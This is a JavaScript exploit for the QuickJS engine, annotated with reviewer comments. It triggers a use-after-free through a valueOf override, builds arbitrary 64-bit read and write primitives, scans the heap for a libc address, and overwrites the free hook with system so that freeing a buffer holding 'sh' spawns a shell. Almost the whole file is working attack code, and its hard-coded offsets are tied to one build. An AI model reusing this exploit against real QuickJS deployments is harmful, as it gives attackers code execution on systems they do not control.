quickjs exploit
// One 8-byte scratch buffer shared by the two conversion helpers below.
// f64_buf and u64_buf are both views over the same bytes, so writing one
// and reading the other reinterprets the bits (u64_buf is a Uint32Array
// holding the low and high halves, despite its name).
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

/**
 * Reinterpret the raw bits of a double as an unsigned 64-bit BigInt.
 * @param {number} val - the double whose bit pattern is wanted
 * @returns {bigint} the 64-bit pattern, low half from u64_buf[0], high half from u64_buf[1]
 */
function ftoi(val) {
  f64_buf[0] = val;
  const lo = BigInt(u64_buf[0]);
  const hi = BigInt(u64_buf[1]);
  return (hi << 32n) | lo;
}

/**
 * Reinterpret a 64-bit BigInt as the double with that bit pattern.
 * @param {bigint} val - the 64-bit pattern; bits above 64 are dropped by the Uint32 stores
 * @returns {number} the double whose bits are val
 */
function itof(val) {
  const lowMask = 0xffffffffn;
  u64_buf[0] = Number(val & lowMask);
  u64_buf[1] = Number(val >> 32n);
  return f64_buf[0];
}
// Exploit body, run once as an IIFE. The numeric constants used below
// (0x48, 0x420, the 0x7ff000000000 mask, 12104, 1664976) are taken as-is
// from the page; they appear to be tied to one particular QuickJS/libc
// build and nothing here shows how they were derived.
(() => {
var pwn = new ArrayBuffer(0x48);
var pwn5 = new ArrayBuffer(0x48);
var pwn2 = new ArrayBuffer(0x420);
var cc = [];
// NOTE(review): b, cc (re-assigned), i and pwn2 below are written without a
// declaration or shadow the var above; in sloppy mode these become globals.
b = [0,1,2];
cc = [];
// valueOf is replaced so that the numeric coercion performed by `pwn++`
// runs this callback: it stores a Float64Array view of pwn into b[0] and
// then overwrites the pwn binding with 0.
pwn.valueOf = () => {
b[0] = new Float64Array(pwn);
pwn = 0;
};
pwn++;
pwn = 0;
// heap: the 64-bit pattern currently readable at b[0][1]; it is used as
// the base address of the scan further down.
const heap = ftoi(b[0][1])
// Two views over pwn5; read64/write64 only ever go through cc[1].
cc.push(new Float64Array(pwn5));
cc.push(new Float64Array(pwn5));
console.log(ftoi(b[0][0]));
console.log(heap);
// Read/write primitives: the address stored into b[0][7] decides what
// cc[1][0] aliases. Why slot 7 of b[0] influences cc[1] is not established
// by anything visible on this page — presumably b[0] overlaps cc[1]'s
// backing-store pointer; TODO confirm.
const read64 = (addr) => {
b[0][7] = itof(addr);
return ftoi(cc[1][0]);
}
const write64 = (addr, val) => {
b[0][7] = itof(addr);
cc[1][0] = itof(val);
}
i = 0;
pwn2 = 0;
var libc_addr = 0;
var tmp = 0;
var tmp2 = 0;
// Scan forward from heap in 8-byte steps for a value in the 0x7ff0_0000_0000
// range whose successor (+8) repeats it and whose predecessor (-8) is below
// 0x500; the first match is kept in libc_addr. The loop's `let i` shadows
// the implicit global i set above, and at i == 0 the i-1 read touches the
// 8 bytes just below heap. If no candidate matches, libc_addr keeps the
// last masked value and the writes below proceed with it anyway.
for(let i=0;i<0x100000;i++) {
libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))&BigInt(0xfff000000000)
if(libc_addr == 0x7ff000000000) {
libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))
tmp = read64(BigInt(heap)+BigInt(i+1)*BigInt(8))
tmp2 = read64(BigInt(heap)+BigInt(i-1)*BigInt(8))
if(libc_addr == tmp && tmp2 < 0x500) {
break;
}
}
}
console.log(libc_addr)
// 26739 == 0x6873, i.e. the bytes "sh" followed by zeros in little-endian.
cc[0][0] = itof(BigInt(26739)) // sh
// Both offsets are relative to the libc_addr found by the scan; they are
// specific to whichever libc the author targeted and cannot be checked here.
write64(BigInt(libc_addr)+BigInt(12104), BigInt(libc_addr)-BigInt(1664976)) // free_hook = system
// Drops the view whose first slot was just set to 26739; what releasing it
// does after the write above depends on the runtime and is not shown here.
cc[0] = 0
})();